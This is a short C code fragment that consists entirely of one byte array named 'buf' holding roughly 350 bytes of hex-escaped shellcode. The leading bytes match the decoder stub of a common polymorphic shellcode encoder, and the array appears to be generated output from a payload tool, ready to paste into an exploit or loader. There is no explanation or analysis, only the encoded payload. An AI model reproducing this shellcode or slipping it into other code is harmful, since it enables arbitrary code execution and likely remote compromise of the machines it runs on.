unsigned char buf[] = 
"\xba\xf8\xa4\x23\xf3\xd9\xc2\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x52\x31\x53\x12\x03\x53\x12\x83\x13\x58\xc1\x06\x1f\x49\x84"
"\xe9\xdf\x8a\xe9\x60\x3a\xbb\x29\x16\x4f\xec\x99\x5c\x1d\x01"
"\x51\x30\xb5\x92\x17\x9d\xba\x13\x9d\xfb\xf5\xa4\x8e\x38\x94"
"\x26\xcd\x6c\x76\x16\x1e\x61\x77\x5f\x43\x88\x25\x08\x0f\x3f"
"\xd9\x3d\x45\xfc\x52\x0d\x4b\x84\x87\xc6\x6a\xa5\x16\x5c\x35"
"\x65\x99\xb1\x4d\x2c\x81\xd6\x68\xe6\x3a\x2c\x06\xf9\xea\x7c"
"\xe7\x56\xd3\xb0\x1a\xa6\x14\x76\xc5\xdd\x6c\x84\x78\xe6\xab"
"\xf6\xa6\x63\x2f\x50\x2c\xd3\x8b\x60\xe1\x82\x58\x6e\x4e\xc0"
"\x06\x73\x51\x05\x3d\x8f\xda\xa8\x91\x19\x98\x8e\x35\x41\x7a"
"\xae\x6c\x2f\x2d\xcf\x6e\x90\x92\x75\xe5\x3d\xc6\x07\xa4\x29"
"\x2b\x2a\x56\xaa\x23\x3d\x25\x98\xec\x95\xa1\x90\x65\x30\x36"
"\xd6\x5f\x84\xa8\x29\x60\xf5\xe1\xed\x34\xa5\x99\xc4\x34\x2e"
"\x59\xe8\xe0\xe1\x09\x46\x5b\x42\xf9\x26\x0b\x2a\x13\xa9\x74"
"\x4a\x1c\x63\x1d\xe1\xe7\xe4\x5d\xf6\xe7\xf5\xc9\xf4\xe7\xe4"
"\x55\x70\x01\x6c\x76\xd4\x9a\x19\xef\x7d\x50\xbb\xf0\xab\x1d"
"\xfb\x7b\x58\xe2\xb2\x8b\x15\xf0\x23\x7c\x60\xaa\xe2\x83\x5e"
"\xc2\x69\x11\x05\x12\xe7\x0a\x92\x45\xa0\xfd\xeb\x03\x5c\xa7"
"\x45\x31\x9d\x31\xad\xf1\x7a\x82\x30\xf8\x0f\xbe\x16\xea\xc9"
"\x3f\x13\x5e\x86\x69\xcd\x08\x60\xc0\xbf\xe2\x3a\xbf\x69\x62"
"\xba\xf3\xa9\xf4\xc3\xd9\x5f\x18\x75\xb4\x19\x27\xba\x50\xae"
"\x50\xa6\xc0\x51\x8b\x62\xe0\xb3\x19\x9f\x89\x6d\xc8\x22\xd4"
"\x8d\x27\x60\xe1\x0d\xcd\x19\x16\x0d\xa4\x1c\x52\x89\x55\x6d"
"\xcb\x7c\x59\xc2\xec\x54";
